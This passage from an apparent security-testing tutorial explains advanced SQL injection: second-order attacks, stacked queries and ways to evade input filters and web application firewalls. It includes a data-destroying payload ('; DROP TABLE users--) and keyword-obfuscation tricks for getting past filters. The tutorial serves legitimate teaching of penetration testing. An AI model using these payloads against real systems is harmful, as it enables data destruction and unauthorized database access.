Advanced SQL Injection Techniques

Beyond fundamental injection techniques lies a realm of sophisticated attacks that bypass common defenses and exploit complex application architectures. Understanding these advanced techniques prepares you for the hardened applications you'll encounter in professional testing.

Second-Order SQL Injection

First-order injection occurs when malicious input is immediately executed against the database. Second-order injection separates input from execution—the malicious payload is stored safely, then executed later when the application uses that stored data in a different context.

Consider a registration form that properly escapes your username before storing it. Your payload enters the database intact because escaping prevented immediate injection. Later, an administrative function retrieves your username and uses it in a different query without re-escaping. Your payload finally executes, potentially in a more privileged context than the original input point.

Second-order attacks require understanding data flow through the application. Where does input appear later? What operations use stored data? Answering these questions reveals opportunities invisible to testers who only examine immediate input processing.

Stacked Queries

Some database configurations and drivers allow multiple statements in a single query, separated by semicolons. This enables attacks far more powerful than standard injection because you can execute entirely new statements rather than merely modifying existing ones.

Injecting '; DROP TABLE users-- doesn't modify the original query's logic; it terminates that query and starts a completely new one. This opens possibilities like INSERT statements to add administrative users, UPDATE statements to modify passwords, or DROP statements to destroy data.

Not all applications support stacked queries. PHP's mysql extension historically didn't, while mysqli and PDO do. Microsoft SQL Server generally supports them. Testing reveals whether your target allows this powerful technique.

Bypassing Filters and WAFs

Modern applications often implement input filtering or deploy Web Application Firewalls to block SQL injection attempts. These defenses require bypass techniques rather than basic payloads.

Case manipulation sometimes works when filters check for specific keywords. If SELECT is blocked, try SeLeCt or sElEcT. Comments can break up filtered terms: SEL/**/ECT or SE%00LECT (null byte injection). URL encoding, double encoding, and character encoding tricks all have their place.

Alternative syntax achieves the same goals with different keywords. Instead of UNION SELECT, try UNION ALL SELECT. Replace OR with || (concatenation in some databases) or mathematical conditions. Different functions accomplish similar results: CONCAT vs + vs || for string concatenation.

Understanding why filters fail helps you bypass them. Simple string matching misses encoding variations. Incomplete keyword lists miss synonyms and alternatives. Regex patterns have edge cases. The more you understand about filter implementation, the more effectively you can circumvent them.